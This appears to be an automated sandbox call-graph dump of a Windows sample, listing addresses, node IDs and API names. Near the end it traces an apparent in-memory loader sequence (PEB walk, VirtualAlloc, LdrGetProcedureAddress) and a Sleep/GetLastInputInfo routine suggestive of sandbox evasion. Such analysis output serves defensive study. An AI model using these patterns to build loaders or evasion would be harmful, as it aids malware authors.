6c6b244a _doexit 144162->144164 144163 6c6b245d 144221 6c6b6fbc 61 API calls __getptd_noexit 144163->144221 144164->144163 144166 6c6b248a 144164->144166 144181 6c6b8289 144166->144181 144167 6c6b2462 144222 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144167->144222 144170 6c6b248f 144171 6c6b24a3 144170->144171 144172 6c6b2496 144170->144172 144174 6c6b24ca 144171->144174 144175 6c6b24aa 144171->144175 144223 6c6b6fbc 61 API calls __getptd_noexit 144172->144223 144199 6c6b7ff2 144174->144199 144224 6c6b6fbc 61 API calls __getptd_noexit 144175->144224 144179 6c6b246d _doexit @_EH4_CallFilterFunc@8 144179->144125 144182 6c6b8295 _doexit 144181->144182 144226 6c6b7fbf 144182->144226 144184 6c6b831f 144266 6c6b7a7a 61 API calls _malloc 144184->144266 144187 6c6b8326 144189 6c6b8334 InitializeCriticalSectionAndSpinCount 144187->144189 144197 6c6b8318 144187->144197 144188 6c6b83a8 _doexit 144188->144170 144190 6c6b8367 EnterCriticalSection 144189->144190 144191 6c6b8354 144189->144191 144190->144197 144267 6c6b355f 61 API calls 2 library calls 144191->144267 144195 6c6b82a3 144195->144184 144195->144197 144236 6c6b7efd 144195->144236 144264 6c6b23a1 62 API calls __lock 144195->144264 144265 6c6b240f LeaveCriticalSection LeaveCriticalSection _doexit 144195->144265 144196 6c6b835c 144196->144197 144233 6c6b83b3 144197->144233 144200 6c6b8014 144199->144200 144201 6c6b8028 144200->144201 144213 6c6b803f 144200->144213 144282 6c6b6fbc 61 API calls __getptd_noexit 144201->144282 144203 6c6b802d 144283 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144203->144283 144204 6c6b8242 144279 6c6c46ba 144204->144279 144205 6c6b8230 144288 6c6b6fbc 61 API calls __getptd_noexit 144205->144288 144209 6c6b8235 144289 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144209->144289 144210 6c6b24d5 144225 6c6b24f0 LeaveCriticalSection LeaveCriticalSection _fgets 144210->144225 144213->144205 144220 6c6b81dc 144213->144220 144284 6c6c4a44 70 API calls __fassign 144213->144284 144214 6c6b81ab 144214->144205 144285 6c6c48de 79 API calls __mbsnbicmp_l 144214->144285 144216 6c6b81d5 144216->144220 144286 6c6c48de 79 API calls __mbsnbicmp_l 144216->144286 144218 6c6b81f4 144218->144220 144287 6c6c48de 79 API calls __mbsnbicmp_l 144218->144287 144220->144204 144220->144205 144221->144167 144222->144179 144223->144179 144224->144179 144225->144179 144227 6c6b7fe7 EnterCriticalSection 144226->144227 144228 6c6b7fd4 144226->144228 144227->144195 144229 6c6b7efd __mtinitlocknum 60 API calls 144228->144229 144230 6c6b7fda 144229->144230 144230->144227 144268 6c6b2e7d 61 API calls 3 library calls 144230->144268 144269 6c6b7ece LeaveCriticalSection 144233->144269 144235 6c6b83ba 144235->144188 144237 6c6b7f09 _doexit 144236->144237 144238 6c6b7f19 144237->144238 144239 6c6b7f31 144237->144239 144270 6c6bb831 61 API calls 2 library calls 144238->144270 144240 6c6b7f2f 144239->144240 144249 6c6b7f3f _doexit 144239->144249 144240->144239 144273 6c6b7a7a 61 API calls _malloc 144240->144273 144243 6c6b7f1e 144271 6c6bb682 61 API calls 7 library calls 144243->144271 144245 6c6b7f4a 144247 6c6b7f51 144245->144247 144248 6c6b7f60 144245->144248 144246 6c6b7f25 144272 6c6b2b5e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 144246->144272 144274 6c6b6fbc 61 API calls __getptd_noexit 144247->144274 144252 6c6b7fbf __lock 60 API calls 144248->144252 144249->144195 144254 6c6b7f67 144252->144254 144253 6c6b7f56 144253->144249 144255 6c6b7f9a 144254->144255 144256 6c6b7f6f InitializeCriticalSectionAndSpinCount 144254->144256 144277 6c6b355f 61 API calls 2 library calls 144255->144277 144257 6c6b7f7f 144256->144257 144258 6c6b7f8b 144256->144258 144275 6c6b355f 61 API calls 2 library calls 144257->144275 144278 6c6b7fb6 LeaveCriticalSection _doexit 144258->144278 144261 6c6b7f85 144276 6c6b6fbc 61 API calls __getptd_noexit 144261->144276 144264->144195 144265->144195 144266->144187 144267->144196 144269->144235 144270->144243 144271->144246 144273->144245 144274->144253 144275->144261 144276->144258 144277->144258 144278->144253 144290 6c6c45c4 144279->144290 144281 6c6c46d5 144281->144210 144282->144203 144283->144210 144284->144214 144285->144216 144286->144218 144287->144220 144288->144209 144289->144210 144291 6c6c45d0 _doexit 144290->144291 144292 6c6c45e3 144291->144292 144294 6c6c4619 144291->144294 144410 6c6b6fbc 61 API calls __getptd_noexit 144292->144410 144301 6c6c3de2 144294->144301 144295 6c6c45e8 144411 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144295->144411 144298 6c6c4633 144412 6c6c465a LeaveCriticalSection __unlock_fhandle 144298->144412 144300 6c6c45f2 _doexit 144300->144281 144302 6c6c3e09 144301->144302 144413 6c6d30ed 144302->144413 144305 6c6c4515 _doexit 144308 6c6c454c 144305->144308 144309 6c6c4537 144305->144309 144306 6c6c3e64 144439 6c6b6fcf 61 API calls __getptd_noexit 144306->144439 144313 6c6c3de2 __tsopen_nolock 114 API calls 144308->144313 144472 6c6b6fbc 61 API calls __getptd_noexit 144309->144472 144311 6c6c3e25 144311->144306 144315 6c6c3ebf 144311->144315 144409 6c6c4094 144311->144409 144312 6c6c3e69 144440 6c6b6fbc 61 API calls __getptd_noexit 144312->144440 144317 6c6c4566 144313->144317 144314 6c6c453c 144473 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144314->144473 144321 6c6c3f46 144315->144321 144325 6c6c3f19 144315->144325 144474 6c6c458a LeaveCriticalSection __unlock_fhandle 144317->144474 144319 6c6c3e73 144441 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144319->144441 144442 6c6b6fcf 61 API calls __getptd_noexit 144321->144442 144323 6c6c4578 144329 6c6c4547 _doexit 144323->144329 144475 6c6b6fbc 61 API calls __getptd_noexit 144323->144475 144420 6c6cdd1c 144325->144420 144326 6c6c3f4b 144443 6c6b6fbc 61 API calls __getptd_noexit 144326->144443 144329->144298 144330 6c6c3f55 144444 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144330->144444 144333 6c6c3e7d 144333->144298 144334 6c6c3fd7 144335 6c6c3fe0 144334->144335 144336 6c6c4001 CreateFileA 144334->144336 144445 6c6b6fcf 61 API calls __getptd_noexit 144335->144445 144337 6c6c409e GetFileType 144336->144337 144338 6c6c402e 144336->144338 144340 6c6c40ef 144337->144340 144341 6c6c40ab GetLastError 144337->144341 144343 6c6c403c 144338->144343 144344 6c6c4067 GetLastError 144338->144344 144452 6c6cdae6 62 API calls 2 library calls 144340->144452 144450 6c6b6fe2 61 API calls 3 library calls 144341->144450 144342 6c6c3fe5 144446 6c6b6fbc 61 API calls __getptd_noexit 144342->144446 144343->144344 144347 6c6c4042 CreateFileA 144343->144347 144448 6c6b6fe2 61 API calls 3 library calls 144344->144448 144347->144337 144347->144344 144349 6c6c40d4 CloseHandle 144351 6c6c40e2 144349->144351 144357 6c6c408e 144349->144357 144350 6c6c3fef 144447 6c6b6fbc 61 API calls __getptd_noexit 144350->144447 144451 6c6b6fbc 61 API calls __getptd_noexit 144351->144451 144355 6c6c410d 144358 6c6c41d2 144355->144358 144359 6c6c4163 144355->144359 144361 6c6c4401 144355->144361 144449 6c6b6fbc 61 API calls __getptd_noexit 144357->144449 144358->144361 144373 6c6c432c 144358->144373 144382 6c6c427c 144358->144382 144453 6c6bee2a 63 API calls 3 library calls 144359->144453 144362 6c6c4323 144361->144362 144361->144409 144362->144361 144363 6c6c448b CloseHandle CreateFileA 144362->144363 144362->144409 144365 6c6c44b8 GetLastError 144363->144365 144363->144409 144364 6c6c416d 144366 6c6c418f 144364->144366 144367 6c6c4176 144364->144367 144469 6c6b6fe2 61 API calls 3 library calls 144365->144469 144456 6c6be68d 71 API calls 6 library calls 144366->144456 144454 6c6b6fcf 61 API calls __getptd_noexit 144367->144454 144371 6c6c44c4 144470 6c6cdb67 62 API calls 2 library calls 144371->144470 144372 6c6c417b 144372->144358 144376 6c6c4183 144372->144376 144373->144361 144384 6c6c4349 144373->144384 144387 6c6c42a0 144373->144387 144374 6c6c41a0 144378 6c6c41b9 144374->144378 144457 6c6d2d37 94 API calls 5 library calls 144374->144457 144455 6c6ba7e8 64 API calls 3 library calls 144376->144455 144377 6c6c42e7 144377->144376 144461 6c6be68d 71 API calls 6 library calls 144377->144461 144378->144376 144458 6c6bee2a 63 API calls 3 library calls 144378->144458 144382->144361 144382->144377 144382->144387 144388 6c6c42cb 144382->144388 144462 6c6c0403 63 API calls 3 library calls 144384->144462 144386 6c6c4354 144386->144387 144389 6c6c435f 144386->144389 144387->144361 144387->144376 144468 6c6c1742 91 API calls 6 library calls 144387->144468 144459 6c6c0403 63 API calls 3 library calls 144388->144459 144463 6c6c0403 63 API calls 3 library calls 144389->144463 144391 6c6c438a 144464 6c6ba7e8 64 API calls 3 library calls 144391->144464 144392 6c6c43a4 144394 6c6c43c6 144392->144394 144400 6c6c43ab 144392->144400 144393 6c6c4301 144393->144362 144393->144376 144393->144391 144393->144392 144393->144394 144467 6c6bee2a 63 API calls 3 library calls 144394->144467 144396 6c6c42d6 144396->144387 144401 6c6c42dd 144396->144401 144466 6c6bee2a 63 API calls 3 library calls 144400->144466 144460 6c6c0403 63 API calls 3 library calls 144401->144460 144402 6c6c4369 144402->144361 144402->144376 144403 6c6c4391 144465 6c6b6fbc 61 API calls __getptd_noexit 144403->144465 144408 6c6c43b5 144408->144362 144408->144376 144471 6c6b6ec5 10 API calls __call_reportfault 144409->144471 144410->144295 144411->144300 144412->144300 144414 6c6d310e 144413->144414 144415 6c6d30f9 144413->144415 144414->144311 144476 6c6b6fbc 61 API calls __getptd_noexit 144415->144476 144417 6c6d30fe 144477 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144417->144477 144419 6c6d3109 144419->144311 144421 6c6cdd28 _doexit 144420->144421 144422 6c6b7efd __mtinitlocknum 61 API calls 144421->144422 144423 6c6cdd38 144422->144423 144424 6c6b7fbf __lock 61 API calls 144423->144424 144425 6c6cdd3d _doexit 144423->144425 144430 6c6cdd4c 144424->144430 144425->144334 144426 6c6cde97 144481 6c6cdeac LeaveCriticalSection _doexit 144426->144481 144428 6c6cde24 144479 6c6b7abf 61 API calls _calloc 144428->144479 144430->144426 144430->144428 144431 6c6b7fbf __lock 61 API calls 144430->144431 144432 6c6cddcc EnterCriticalSection 144430->144432 144435 6c6cdda2 InitializeCriticalSectionAndSpinCount 144430->144435 144478 6c6cddee LeaveCriticalSection _doexit 144430->144478 144431->144430 144432->144430 144434 6c6cdddc LeaveCriticalSection 144432->144434 144433 6c6cde2d 144433->144426 144480 6c6cdc56 63 API calls 3 library calls 144433->144480 144434->144430 144435->144430 144437 6c6cde8e 144437->144426 144439->144312 144440->144319 144441->144333 144442->144326 144443->144330 144444->144333 144445->144342 144446->144350 144447->144333 144448->144357 144449->144409 144450->144349 144451->144357 144452->144355 144453->144364 144454->144372 144455->144357 144456->144374 144457->144378 144458->144372 144459->144396 144460->144377 144461->144393 144462->144386 144463->144402 144464->144403 144465->144409 144466->144408 144467->144402 144468->144387 144469->144371 144470->144409 144471->144305 144472->144314 144473->144329 144474->144323 144475->144329 144476->144417 144477->144419 144478->144430 144479->144433 144480->144437 144481->144425 144482->144131 144483->144135 144484->144134 144485->144135 144486->144159 144487 6c675835 144490 6c675840 144487->144490 144488 6c6b1f75 __output_l 5 API calls 144489 6c676653 144488->144489 144491 6c675b85 144490->144491 144492 6c675950 144490->144492 144522 6c67586f 144490->144522 144493 6c675ce6 144491->144493 144494 6c675b8f 144491->144494 144510 6c675963 144492->144510 144574 6c677969 144 API calls __output_l 144492->144574 144496 6c676597 144493->144496 144517 6c675d3b 144493->144517 144494->144496 144497 6c675b9b 144494->144497 144496->144522 144631 6c676ed9 144 API calls 144496->144631 144500 6c675c1a 144497->144500 144501 6c675bde 144497->144501 144578 6c681275 144 API calls 2 library calls 144497->144578 144498 6c675972 144498->144522 144577 6c67b5d7 144 API calls __output_l 144498->144577 144504 6c677458 143 API calls 144500->144504 144509 6c675c8f 144500->144509 144501->144500 144579 6c67045b 144 API calls 2 library calls 144501->144579 144503 6c675b36 144503->144522 144576 6c673d23 96 API calls 2 library calls 144503->144576 144504->144509 144509->144522 144580 6c67bacb 143 API calls __output_l 144509->144580 144516 6c67596a 144510->144516 144510->144522 144560 6c677458 144510->144560 144511 6c675c05 144511->144500 144513 6c675cd6 144511->144513 144581 6c6713bf 96 API calls 2 library calls 144513->144581 144516->144498 144516->144522 144575 6c67157b 96 API calls 2 library calls 144516->144575 144518 6c675d44 144517->144518 144519 6c675e5f 144517->144519 144518->144522 144582 6c672d37 96 API calls 2 library calls 144518->144582 144520 6c675f53 144519->144520 144521 6c675e68 144519->144521 144523 6c675fc5 144520->144523 144524 6c675f58 144520->144524 144521->144522 144585 6c672f12 96 API calls 2 library calls 144521->144585 144522->144488 144525 6c675fca 144523->144525 144532 6c67600d 144523->144532 144524->144522 144588 6c67d768 144 API calls 2 library calls 144524->144588 144525->144522 144589 6c67d768 144 API calls 2 library calls 144525->144589 144528 6c675d7f 144528->144522 144583 6c672d37 96 API calls 2 library calls 144528->144583 144529 6c675ea1 144529->144522 144586 6c672f12 96 API calls 2 library calls 144529->144586 144532->144522 144535 6c67607f 144532->144535 144536 6c67604d 144532->144536 144535->144522 144538 6c6b1f84 _sprintf 96 API calls 144535->144538 144539 6c6760fb 144535->144539 144544 6c676189 144535->144544 144558 6c6763fd 144535->144558 144590 6c67e5a0 143 API calls 2 library calls 144536->144590 144538->144535 144591 6c67e5a0 143 API calls 2 library calls 144539->144591 144540 6c675da8 144540->144522 144584 6c67bc0b 143 API calls __output_l 144540->144584 144543 6c675ecc 144543->144522 144587 6c67bc0b 143 API calls __output_l 144543->144587 144546 6c6762ee 144544->144546 144547 6c67619d 144544->144547 144546->144522 144550 6c6b1f84 _sprintf 96 API calls 144546->144550 144592 6c676ed9 144 API calls 144547->144592 144550->144522 144551 6c6761c7 144593 6c674554 143 API calls 144551->144593 144556 6c6761fa 144556->144522 144594 6c67a095 144 API calls __output_l 144556->144594 144595 6c676ed9 144 API calls 144556->144595 144596 6c674554 143 API calls 144556->144596 144558->144522 144597 6c677cc1 144558->144597 144629 6c678689 144 API calls __output_l 144558->144629 144630 6c676ed9 144 API calls 144558->144630 144561 6c6774c5 144560->144561 144562 6c677cc1 143 API calls 144561->144562 144563 6c6775ca 144561->144563 144562->144563 144564 6c677cc1 143 API calls 144563->144564 144566 6c67766f 144563->144566 144572 6c6776b9 144563->144572 144570 6c6776b1 144564->144570 144565 6c677cc1 143 API calls 144573 6c677788 144565->144573 144566->144565 144566->144572 144566->144573 144567 6c6b1f75 __output_l 5 API calls 144568 6c677967 144567->144568 144568->144516 144569 6c677cc1 143 API calls 144569->144572 144570->144566 144570->144572 144632 6c67157b 96 API calls 2 library calls 144570->144632 144572->144567 144573->144569 144573->144572 144574->144510 144575->144503 144576->144498 144577->144522 144578->144501 144579->144511 144580->144522 144581->144522 144582->144528 144583->144540 144584->144522 144585->144529 144586->144543 144587->144522 144588->144522 144589->144522 144590->144522 144591->144522 144592->144551 144593->144556 144594->144556 144595->144556 144596->144556 144600 6c677d11 144597->144600 144598 6c677e10 144599 6c677f8b 144598->144599 144633 6c687866 144598->144633 144604 6c677fbd 144599->144604 144612 6c678237 __cftoa_l 144599->144612 144625 6c677d86 144599->144625 144600->144598 144600->144625 144655 6c6b28b7 96 API calls 5 library calls 144600->144655 144603 6c677de6 144605 6c677dfb 144603->144605 144656 6c6b355f 61 API calls 2 library calls 144603->144656 144621 6c678010 144604->144621 144659 6c67bdd0 111 API calls 7 library calls 144604->144659 144605->144598 144657 6c6b355f 61 API calls 2 library calls 144605->144657 144607 6c6b1f75 __output_l 5 API calls 144610 6c6783ba 144607->144610 144610->144558 144611 6c677ff4 144611->144621 144611->144625 144660 6c67d28e 5 API calls __output_l 144611->144660 144614 6c6782bd 144612->144614 144615 6c67826a 144612->144615 144612->144625 144617 6c6b1f84 _sprintf 96 API calls 144614->144617 144616 6c6b1f84 _sprintf 96 API calls 144615->144616 144619 6c6782b8 144616->144619 144617->144619 144622 6c6b1f84 _sprintf 96 API calls 144619->144622 144620 6c677f78 144658 6c67c4dc 120 API calls 14 library calls 144620->144658 144624 6c677cc1 143 API calls 144621->144624 144621->144625 144622->144625 144624->144625 144625->144607 144626 6c677e3c __mbschr_l __cftoa_l _strncmp 144626->144620 144626->144625 144627 6c688f22 61 API calls 144626->144627 144628 6c6b1f84 _sprintf 96 API calls 144626->144628 144645 6c6783bc 144626->144645 144627->144626 144628->144626 144629->144558 144630->144558 144631->144522 144632->144566 144634 6c687877 144633->144634 144638 6c687895 144633->144638 144635 6c68789c 144634->144635 144634->144638 144636 6c6878ca 144635->144636 144637 6c6878aa 144635->144637 144642 6c6b1f84 _sprintf 96 API calls 144636->144642 144639 6c6b1f84 _sprintf 96 API calls 144637->144639 144661 6c6686d4 61 API calls __floor_pentium4 144638->144661 144641 6c6878c2 144639->144641 144641->144626 144642->144641 144643 6c687948 144644 6c6b1f84 _sprintf 96 API calls 144643->144644 144644->144641 144653 6c6783f0 144645->144653 144646 6c678575 144647 6c6b1f84 _sprintf 96 API calls 144646->144647 144648 6c678592 144647->144648 144649 6c6b1f75 __output_l 5 API calls 144648->144649 144650 6c6785c8 144649->144650 144650->144626 144651 6c6785ca 144651->144648 144652 6c6b1f84 _sprintf 96 API calls 144651->144652 144652->144648 144653->144646 144653->144648 144653->144651 144654 6c6b24fa 137 API calls 144653->144654 144654->144653 144655->144603 144656->144605 144657->144598 144658->144599 144659->144611 144660->144621 144661->144643 144662 6c676993 144663 6c676998 144662->144663 144663->144663 144664 6c6b1f75 __output_l 5 API calls 144663->144664 144665 6c676ab9 144664->144665 144666 6c63bca4 144667 6c63bcb0 144666->144667 144668 6c6b1f84 96 API calls _sprintf 144667->144668 144672 6c63bfa9 144667->144672 144676 6c680679 144667->144676 144691 6c650b5b 61 API calls __floor_pentium4 144667->144691 144692 6c6d6d20 61 API calls 144667->144692 144693 6c680847 146 API calls 2 library calls 144667->144693 144668->144667 144673 6c6b1f75 __output_l 5 API calls 144672->144673 144674 6c63bfb6 144673->144674 144677 6c6806a3 144676->144677 144694 6c67f7da 144677->144694 144681 6c680798 144682 6c6b1f75 __output_l 5 API calls 144681->144682 144683 6c6807c2 144682->144683 144683->144667 144684 6c6806b7 144684->144681 144685 6c68072e 144684->144685 144686 6c680741 144684->144686 144689 6c6806fe 144684->144689 144773 6c67f3fb 99 API calls 3 library calls 144685->144773 144774 6c680238 99 API calls 6 library calls 144686->144774 144689->144681 144721 6c67faa9 144689->144721 144691->144667 144692->144667 144693->144667 144695 6c67f823 144694->144695 144704 6c67f81b 144694->144704 144696 6c67f861 144695->144696 144698 6c6783bc 142 API calls 144695->144698 144696->144704 144775 6c6b4496 95 API calls 5 library calls 144696->144775 144697 6c6b1f75 __output_l 5 API calls 144700 6c67faa4 144697->144700 144701 6c67f840 144698->144701 144713 6c67f2b5 144700->144713 144701->144696 144702 6c6783bc 142 API calls 144701->144702 144702->144696 144704->144697 144705 6c67fa57 144779 6c6b4ae0 61 API calls __output_l 144705->144779 144708 6c6b1f84 _sprintf 96 API calls 144712 6c67f880 __mbschr_l 144708->144712 144710 6c67f33d 64 API calls 144710->144712 144711 6c688f22 61 API calls 144711->144712 144712->144704 144712->144705 144712->144708 144712->144710 144712->144711 144712->144712 144776 6c67f3fb 99 API calls 3 library calls 144712->144776 144777 6c6b49b0 79 API calls __tolower_l 144712->144777 144778 6c6b3007 76 API calls 5 library calls 144712->144778 144714 6c67f2c8 __mbschr_l _strncpy 144713->144714 144715 6c67f2f1 144714->144715 144780 6c688f22 61 API calls 3 library calls 144714->144780 144718 6c67f30f 144715->144718 144781 6c6b49b0 79 API calls __tolower_l 144715->144781 144719 6c6b1f84 _sprintf 96 API calls 144718->144719 144720 6c67f332 144718->144720 144719->144720 144720->144684 144722 6c67faeb 144721->144722 144726 6c67fb88 144722->144726 144790 6c676655 61 API calls 2 library calls 144722->144790 144724 6c67fb40 144728 6c67fb4e _memset 144724->144728 144791 6c6713bf 96 API calls 2 library calls 144724->144791 144729 6c6b1f84 _sprintf 96 API calls 144726->144729 144728->144726 144792 6c6b28b7 96 API calls 5 library calls 144728->144792 144730 6c67fc00 144729->144730 144731 6c67fd0f 144730->144731 144793 6c68817c 61 API calls 144730->144793 144733 6c67fd5a 144731->144733 144796 6c685db6 5 API calls __output_l 144731->144796 144734 6c67fde1 144733->144734 144782 6c67726b 144733->144782 144751 6c67fe3c 144734->144751 144770 6c67fdb3 144734->144770 144798 6c680e52 143 API calls 144734->144798 144735 6c67fce2 144794 6c684712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144735->144794 144740 6c67fcf9 144795 6c684712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144740->144795 144741 6c67fe1b 144741->144770 144799 6c680e52 143 API calls 144741->144799 144744 6c67fd2e 144744->144733 144797 6c685c0c 61 API calls __output_l 144744->144797 144747 6c67726b 144 API calls 144747->144734 144748 6c6b1f75 __output_l 5 API calls 144750 6c680236 144748->144750 144749 6c67ff40 144756 6c67ff73 144749->144756 144801 6c67a96a 5 API calls __output_l 144749->144801 144750->144681 144751->144749 144751->144770 144772 6c67fffc 144751->144772 144800 6c67abd5 5 API calls __output_l 144751->144800 144752 6c67ffaf 144752->144772 144803 6c684712 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144752->144803 144756->144752 144802 6c685c0c 61 API calls __output_l 144756->144802 144758 6c6800fc 144806 6c679dc8 143 API calls __output_l 144758->144806 144759 6c68012f 144765 6c680149 144759->144765 144766 6c680136 144759->144766 144760 6c67ffda 144760->144772 144804 6c67a5e7 61 API calls 144760->144804 144761 6c68003f 144761->144758 144761->144759 144771 6c68010f 144761->144771 144808 6c682e6b 61 API calls __output_l 144765->144808 144807 6c679ef2 143 API calls __output_l 144766->144807 144770->144748 144771->144770 144809 6c682e6b 61 API calls __output_l 144771->144809 144772->144761 144805 6c67a73a 5 API calls __output_l 144772->144805 144773->144689 144774->144689 144775->144712 144776->144712 144777->144712 144778->144712 144779->144704 144780->144714 144781->144715 144783 6c677287 144782->144783 144786 6c677273 144782->144786 144810 6c677969 144 API calls __output_l 144783->144810 144785 6c677458 143 API calls 144789 6c67727a 144785->144789 144786->144785 144788 6c677282 144786->144788 144786->144789 144788->144747 144788->144770 144789->144788 144811 6c673d23 96 API calls 2 library calls 144789->144811 144790->144724 144791->144728 144792->144728 144793->144735 144794->144740 144795->144731 144796->144744 144797->144733 144798->144741 144799->144751 144800->144749 144801->144756 144802->144752 144803->144760 144804->144772 144805->144761 144806->144771 144807->144771 144808->144771 144809->144770 144810->144786 144811->144788 144812 6c633ffb 144813 6c63400a __EH_prolog3_catch_GS 144812->144813 144819 6c633021 144813->144819 144817 6c63401b 144848 6c6514fc 110 API calls 4 library calls 144817->144848 144820 6c63303b __flsbuf _memset 144819->144820 144821 6c6330c7 GetModuleFileNameA 144820->144821 144822 6c63313b 144821->144822 144823 6c6b1f75 __output_l 5 API calls 144822->144823 144824 6c633175 144823->144824 144825 6c654afa 144824->144825 144826 6c654b26 144825->144826 144827 6c654b2e 144825->144827 144849 6c6547b5 144826->144849 144844 6c654b82 144827->144844 144870 6c6b2a1f 76 API calls 5 library calls 144827->144870 144830 6c654b48 144871 6c6b2220 63 API calls 4 library calls 144830->144871 144832 6c6b1f75 __output_l 5 API calls 144835 6c654c05 144832->144835 144833 6c654b54 144834 6c654b5c 144833->144834 144841 6c654b84 144833->144841 144836 6c6b1f84 _sprintf 96 API calls 144834->144836 144835->144817 144838 6c654b74 144836->144838 144872 6c6517c6 97 API calls 2 library calls 144838->144872 144840 6c654b9d 144875 6c6b3b76 61 API calls __output_l 144840->144875 144841->144840 144873 6c6b3b76 61 API calls __output_l 144841->144873 144874 6c6b2a1f 76 API calls 5 library calls 144841->144874 144844->144832 144846 6c654ba3 144846->144844 144876 6c6b3b76 61 API calls __output_l 144846->144876 144877 6c6b2a1f 76 API calls 5 library calls 144846->144877 144848->144817 144850 6c6547e5 144849->144850 144851 6c6b1f84 _sprintf 96 API calls 144850->144851 144867 6c6547ff 144851->144867 144852 6c654a8f 144853 6c654ac0 144852->144853 144854 6c654a93 144852->144854 144856 6c654abe 144853->144856 144860 6c6b1f84 _sprintf 96 API calls 144853->144860 144854->144856 144859 6c6b1f84 _sprintf 96 API calls 144854->144859 144855 6c6b1f84 _sprintf 96 API calls 144857 6c65484b GetModuleFileNameA 144855->144857 144858 6c6b1f75 __output_l 5 API calls 144856->144858 144857->144867 144861 6c654af8 144858->144861 144862 6c654ab0 144859->144862 144863 6c654ae0 144860->144863 144861->144827 144878 6c651814 97 API calls 2 library calls 144862->144878 144879 6c6b28b7 96 API calls 5 library calls 144863->144879 144866 6c6b24fa 137 API calls 144866->144867 144867->144852 144867->144853 144867->144855 144867->144866 144868 6c6b1f84 96 API calls _sprintf 144867->144868 144869 6c6b330e 93 API calls __wgetenv 144867->144869 144868->144867 144869->144867 144870->144830 144871->144833 144872->144844 144873->144841 144874->144841 144875->144846 144876->144846 144877->144846 144878->144856 144879->144856 144880 6c63404f 144881 6c634021 144880->144881 144883 6c6514fc 110 API calls 4 library calls 144881->144883 144883->144881 144884 6c63b1de 144885 6c63b1ed 144884->144885 144886 6c6b1f84 _sprintf 96 API calls 144885->144886 144887 6c63b1fa 144886->144887 144888 6c6b1f84 _sprintf 96 API calls 144887->144888 144890 6c63b21d 144888->144890 144906 6c6b330e 144890->144906 144891 6c63b250 144895 6c6b1f84 _sprintf 96 API calls 144891->144895 144896 6c63b275 144891->144896 144892 6c6b330e __wgetenv 93 API calls 144897 6c63b282 144892->144897 144893 6c63b2a7 144894 6c6b330e __wgetenv 93 API calls 144893->144894 144900 6c63b2b0 144894->144900 144895->144896 144896->144892 144897->144893 144899 6c6b1f84 _sprintf 96 API calls 144897->144899 144898 6c63b2d5 144901 6c6b1f84 _sprintf 96 API calls 144898->144901 144899->144893 144900->144898 144902 6c6b1f84 _sprintf 96 API calls 144900->144902 144903 6c63b2f7 144901->144903 144902->144898 144904 6c6b1f75 __output_l 5 API calls 144903->144904 144905 6c63b31c 144904->144905 144908 6c6b331a _doexit _strnlen 144906->144908 144907 6c6b3326 144919 6c6b6fbc 61 API calls __getptd_noexit 144907->144919 144908->144907 144912 6c6b3352 144908->144912 144910 6c6b332b 144920 6c6b6f31 10 API calls __invalid_parameter_noinfo_noreturn 144910->144920 144913 6c6b7fbf __lock 61 API calls 144912->144913 144914 6c6b3359 144913->144914 144921 6c6b3160 93 API calls 3 library calls 144914->144921 144916 6c6b3366 144922 6c6b337f LeaveCriticalSection _doexit 144916->144922 144918 6c6b3336 _doexit 144918->144891 144919->144910 144920->144918 144921->144916 144922->144918 144923 32fe051 144935 32feb31 GetPEB 144923->144935 144925 32fe2ba 144926 32feb31 GetPEB 144925->144926 144927 32fe2c6 144926->144927 144928 32fe4ba GetNativeSystemInfo 144927->144928 144933 32feafe 144927->144933 144929 32fe4e7 VirtualAlloc 144928->144929 144928->144933 144931 32fe500 144929->144931 144930 32fe818 LdrGetProcedureAddress 144930->144931 144931->144930 144932 32fe866 144931->144932 144932->144932 144932->144933 144937 1000f100 144932->144937 144936 32feb4d 144935->144936 144936->144925 144936->144936 144938 1000f10b 144937->144938 144939 1000f12d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 144937->144939 144938->144939 144941 1000f15d 144938->144941 144992 1000ffb0 24 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 144939->144992 144987 100414c7 144941->144987 144942 1000f155 144942->144933 144944 1000f162 144945 100425aa 25 API calls 144944->144945 144946 1000f1ae 144945->144946 144947 10041738 36 API calls 144946->144947 144948 1000f1b4 144947->144948 144949 1000eac0 60 API calls 144948->144949 144985 1000f212 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 144949->144985 144950 1000fd00 144951 1000f100 213 API calls 144950->144951 144952 1000fd0b 144951->144952 144953 10038bd3 _com_util::ConvertStringToBSTR SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144952->144953 144955 1000fd22 144953->144955 144954 1000a360 25 API calls 144954->144985 144955->144933 144956 1000c1c0 131 API calls 144956->144985 144957 1000fd26 144958 100414c7 24 API calls 144957->144958 144959 1000fd2b GetModuleFileNameA 144958->144959 144961 1000fd60 144959->144961 144960 1000f401 Sleep 144962 1000f412 144960->144962 144961->144961 144963 10009e90 25 API calls 144961->144963 144964 1000f000 98 API calls 144962->144964 144962->144985 144966 1000fd7b 144963->144966 144964->144962 144965 1000f59a GetLastInputInfo 144965->144985 144968 1000dbd0 213 API calls 144966->144968 144967 10009e90 25 API calls 144967->144985 144969 1000fd80 144968->144969 144970 1000fd84 6 API calls 144969->144970 144971 1000fdfb 144969->144971 144970->144971 145011 10020310 SetEvent 144970->145011 144972 10038bd3 _com_util::ConvertStringToBSTR SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 144971->144972 144973 1000fe0a 144972->144973 144973->144933 144974 10012620 25 API calls 144974->144985 144975 1000ab10 67 API calls 144975->144985 144976 1001ce10 73 API calls 144976->144985 144977 1001bc50 27 API calls 144977->144985 144978 1000b9d0 29 API calls 144978->144985 144979 10013ec0 42 API calls 144979->144985 144980 10010270 25 API calls 144980->144985 144981 